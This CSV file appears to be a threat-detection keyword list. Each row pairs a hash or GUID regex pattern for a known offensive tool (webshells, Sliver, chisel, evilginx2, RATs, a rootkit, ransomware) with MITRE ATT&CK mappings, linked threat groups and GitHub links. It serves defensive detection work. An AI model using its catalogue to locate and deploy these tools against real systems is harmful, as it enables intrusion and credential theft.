"*1d3ac5240766338d781a6a0820e6bcec4db675910ce4bb2b1a96d45e71cf2495*",".{0,1000}1d3ac5240766338d781a6a0820e6bcec4db675910ce4bb2b1a96d45e71cf2495.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22810"
"*1d3d87c94b03ba803b6af7fd142dd874aa26a2754aa6874b7c498d26ff6152e2*",".{0,1000}1d3d87c94b03ba803b6af7fd142dd874aa26a2754aa6874b7c498d26ff6152e2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","22811"
"*1d49fd236c80d04b58e6b18b516392332dc80171a56d03104be873eb9978e889*",".{0,1000}1d49fd236c80d04b58e6b18b516392332dc80171a56d03104be873eb9978e889.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22812"
"*1d4c6a6ae56e7a9983254e4a31a368ebea653d96277466ffb8127e8ce0b54369*",".{0,1000}1d4c6a6ae56e7a9983254e4a31a368ebea653d96277466ffb8127e8ce0b54369.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","22813"
"*1d502988647b7e21c22e7300484d382f04132e3df644d93752457041a4aeb21a*",".{0,1000}1d502988647b7e21c22e7300484d382f04132e3df644d93752457041a4aeb21a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22814"
"*1d523c11769bcf3b85ae63c7d023e531962f46e04dc485c87d69bff6e31635ef*",".{0,1000}1d523c11769bcf3b85ae63c7d023e531962f46e04dc485c87d69bff6e31635ef.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22815"
"*1d533c26001b29f11e09de0c350cab64faef97ea49a41f579d01b9ae74d2a0e9*",".{0,1000}1d533c26001b29f11e09de0c350cab64faef97ea49a41f579d01b9ae74d2a0e9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22816"
"*1d6cb6d414c0b9502a585b5b4ec30b76823c0a91dd4d1d301af484c47e39c426*",".{0,1000}1d6cb6d414c0b9502a585b5b4ec30b76823c0a91dd4d1d301af484c47e39c426.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","22821"
"*1d6ccca21efe8d8de4cc4aa1598fc4d9ed15e82f66c84f927b411f255e0faa8c*",".{0,1000}1d6ccca21efe8d8de4cc4aa1598fc4d9ed15e82f66c84f927b411f255e0faa8c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22822"
"*1d6d4c0b001fc20d404d6e2ec3625d9fc245c31484023e2ac7a3b123eec8cce1*",".{0,1000}1d6d4c0b001fc20d404d6e2ec3625d9fc245c31484023e2ac7a3b123eec8cce1.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","22823"
"*1d70076be53e454fdb7dda0570961920e6bfe2d11ab0080064e206dd20c83333*",".{0,1000}1d70076be53e454fdb7dda0570961920e6bfe2d11ab0080064e206dd20c83333.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","22824"
"*1d72c6c584e8d98f42b7ed368a592e7d24bd773f611f174fa9834c0d949a46fb*",".{0,1000}1d72c6c584e8d98f42b7ed368a592e7d24bd773f611f174fa9834c0d949a46fb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22827"
"*1d74b18520b9569c5c602ee48a995069dddb67e6343ae2cadce691f1e72609d0*",".{0,1000}1d74b18520b9569c5c602ee48a995069dddb67e6343ae2cadce691f1e72609d0.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","22828"
"*1d86c9e3eb7fe0980381f071b0416ba1f53f665c18b418b66c0ce2344d98a135*",".{0,1000}1d86c9e3eb7fe0980381f071b0416ba1f53f665c18b418b66c0ce2344d98a135.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22832"
"*1d89fe4074ee5023c5c784c5e1020cb74eef55f476900db9ad1431f6d25bde22*",".{0,1000}1d89fe4074ee5023c5c784c5e1020cb74eef55f476900db9ad1431f6d25bde22.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","22833"
"*1d8c3c650deb96f67cc45bd76fc298c483cb961f04ce157bbda8e5f2cf3f12ff*",".{0,1000}1d8c3c650deb96f67cc45bd76fc298c483cb961f04ce157bbda8e5f2cf3f12ff.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22834"
"*1d94828540ae000cecb082b08ad72b9dfe44069af779a91ae3b827671efdc5d3*",".{0,1000}1d94828540ae000cecb082b08ad72b9dfe44069af779a91ae3b827671efdc5d3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22836"
"*1d9b4121c2dbc17a4db31341da2097cd430a61201c57185a42fb687f22f704eb*",".{0,1000}1d9b4121c2dbc17a4db31341da2097cd430a61201c57185a42fb687f22f704eb.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","#filehash","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","22838"
"*1d9c55784ea8bb607ae075d4cf53a294b6ff05434414ecfddce740fb2e1e78da*",".{0,1000}1d9c55784ea8bb607ae075d4cf53a294b6ff05434414ecfddce740fb2e1e78da.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22839"
"*1da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd7871da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd787*",".{0,1000}1da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd7871da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd787.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","22842"
"*1da30fe79063333fc5fa8dbf291b5bcc0c07e1ae64722b4de7177eecfa261198*",".{0,1000}1da30fe79063333fc5fa8dbf291b5bcc0c07e1ae64722b4de7177eecfa261198.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","22843"
"*1da68fc3d86dc4d5d67359180fbeb8ad68ae90e347d1a9c12f77e21959c25efa*",".{0,1000}1da68fc3d86dc4d5d67359180fbeb8ad68ae90e347d1a9c12f77e21959c25efa.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22844"
"*1db1f717560d1c53a8ec668a80aad419da22a84b1705f7dfbcc3075634634f64*",".{0,1000}1db1f717560d1c53a8ec668a80aad419da22a84b1705f7dfbcc3075634634f64.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#filehash","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","22846"
"*1db4fad9a062ba7ef43ec84f312716f72842c934ce7709d0ff2ede56c156517b*",".{0,1000}1db4fad9a062ba7ef43ec84f312716f72842c934ce7709d0ff2ede56c156517b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22847"
"*1db6bf67e6e3a421c4cd377cdd026a5de25a55809a9a2c56e0aa092ef4c8e02e*",".{0,1000}1db6bf67e6e3a421c4cd377cdd026a5de25a55809a9a2c56e0aa092ef4c8e02e.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22848"
"*1DCD5A4349F3E617AF53DCFA24600FD169CFDD53DECE33FD72C6D66C2991D240*",".{0,1000}1DCD5A4349F3E617AF53DCFA24600FD169CFDD53DECE33FD72C6D66C2991D240.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","22850"
"*1dd570b9672796c8062a8871e279870508d3c04e213c4f379dbe625216d310a6*",".{0,1000}1dd570b9672796c8062a8871e279870508d3c04e213c4f379dbe625216d310a6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22852"
"*1dd63a324303ac18c64c435bf6acfff6efa419b20c305dddb9905cde41feeb4c*",".{0,1000}1dd63a324303ac18c64c435bf6acfff6efa419b20c305dddb9905cde41feeb4c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","22853"
"*1de0d1e7805edcd36247e2c224aa8c691c774ba8497f88f2e2dea157c30906a9*",".{0,1000}1de0d1e7805edcd36247e2c224aa8c691c774ba8497f88f2e2dea157c30906a9.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","22854"
"*1de467a837f7bf75b522bf34b0a2711213d73c7ca8101b4535a5bbdc94323ac7*",".{0,1000}1de467a837f7bf75b522bf34b0a2711213d73c7ca8101b4535a5bbdc94323ac7.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","22855"
"*1de72bb4f116e969faff90c1e915e70620b900e3117788119cffc644956a9183*",".{0,1000}1de72bb4f116e969faff90c1e915e70620b900e3117788119cffc644956a9183.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","22856"
"*1de7f78ed7238628f18928f1ba7a499e0aa844870865661110db15ed1cb3a1d5*",".{0,1000}1de7f78ed7238628f18928f1ba7a499e0aa844870865661110db15ed1cb3a1d5.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","#filehash","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","22858"
"*1df00852a369cbb0fd8934ff0caaa785f9a0e64df8b3c723f67ea0af9bd3f264*",".{0,1000}1df00852a369cbb0fd8934ff0caaa785f9a0e64df8b3c723f67ea0af9bd3f264.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","22859"
"*1df43548fa3f18b13fef3d1d1e7c5349ec9de9446e391b9dbb09d1bd57cc9be3*",".{0,1000}1df43548fa3f18b13fef3d1d1e7c5349ec9de9446e391b9dbb09d1bd57cc9be3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22862"
"*1df5732630ef44f85708aa64495812d0bae8f96e577b6c869277091eab28d54e*",".{0,1000}1df5732630ef44f85708aa64495812d0bae8f96e577b6c869277091eab28d54e.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","22863"
"*1df8bc4fb468ccc0fd85b553411d9b3eb7a2ba4c4a4469ae41913eef9a9e65f6*",".{0,1000}1df8bc4fb468ccc0fd85b553411d9b3eb7a2ba4c4a4469ae41913eef9a9e65f6.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","#filehash","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","22864"
"*1df8e073ca89d026578464b0da9748194ef62c826dea4af9848ef23b3ddf1785*",".{0,1000}1df8e073ca89d026578464b0da9748194ef62c826dea4af9848ef23b3ddf1785.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22865"
"*1DFC488D-E104-4F35-98DA-F23BF6D3F9DC*",".{0,1000}1DFC488D\-E104\-4F35\-98DA\-F23BF6D3F9DC.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#GUIDproject","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","22867"
"*1e00cb67cc7d0f6610235ae151268e1aa8c38fe8f2675f9884baf1dde23d9303*",".{0,1000}1e00cb67cc7d0f6610235ae151268e1aa8c38fe8f2675f9884baf1dde23d9303.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","22868"
"*1e05c9543989d8f9034dcd87f662ef8319c624a1988b800ad77676f55a2bc538*",".{0,1000}1e05c9543989d8f9034dcd87f662ef8319c624a1988b800ad77676f55a2bc538.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","22869"
"*1e06baefc53c4bd963aca273bc8a05d683664c755a20baf2a04c95c5e3888ca0*",".{0,1000}1e06baefc53c4bd963aca273bc8a05d683664c755a20baf2a04c95c5e3888ca0.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","22870"
"*1e078b5c876c4e5070b19a314be3b7385a3e2fc6a427f2ffcc2a2340b7c2b52f*",".{0,1000}1e078b5c876c4e5070b19a314be3b7385a3e2fc6a427f2ffcc2a2340b7c2b52f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22871"
"*1E0986B4-4BF3-4CEA-A885-347B6D232D46*",".{0,1000}1E0986B4\-4BF3\-4CEA\-A885\-347B6D232D46.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","#GUIDproject","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","22872"
"*1e0d1441d6cc702501cd4fa67abc59887a1afedb25dc0b2aeda80cf168469883*",".{0,1000}1e0d1441d6cc702501cd4fa67abc59887a1afedb25dc0b2aeda80cf168469883.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","22873"
"*1e0e69ae876004f656546d2da0a7947e040a1bfe4fa9925b84a70cdc0ded69a0*",".{0,1000}1e0e69ae876004f656546d2da0a7947e040a1bfe4fa9925b84a70cdc0ded69a0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22875"
"*1e189b7c760b1ff8db8fdf2290818908dbdad966d74bb77a37dd714f879f4e6f*",".{0,1000}1e189b7c760b1ff8db8fdf2290818908dbdad966d74bb77a37dd714f879f4e6f.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","22876"
"*1e1e309cc05c6438400f8632b2ac6c375e9d96ebb3b7a2373ff341e4a91fe11e*",".{0,1000}1e1e309cc05c6438400f8632b2ac6c375e9d96ebb3b7a2373ff341e4a91fe11e.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","22877"
